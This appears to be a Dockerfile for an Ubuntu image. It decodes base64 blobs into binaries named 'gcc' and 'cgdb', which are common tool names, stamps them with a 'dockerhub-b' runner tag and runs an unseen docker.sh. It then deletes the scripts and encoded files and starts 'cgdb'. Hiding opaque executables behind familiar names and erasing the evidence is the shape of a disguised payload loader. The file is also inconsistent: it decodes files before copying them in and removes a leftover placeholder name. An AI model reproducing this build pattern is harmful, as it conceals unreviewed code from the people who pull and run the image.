FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > cgdb.log'

RUN base64 --decode cgdb.64 > cgdb
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY cgdb .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' cgdb
RUN bash ./docker.sh

RUN rm --force --recursive cgdb _REPO_NAME__.64 docker.sh gcc gcc.64

CMD cgdb
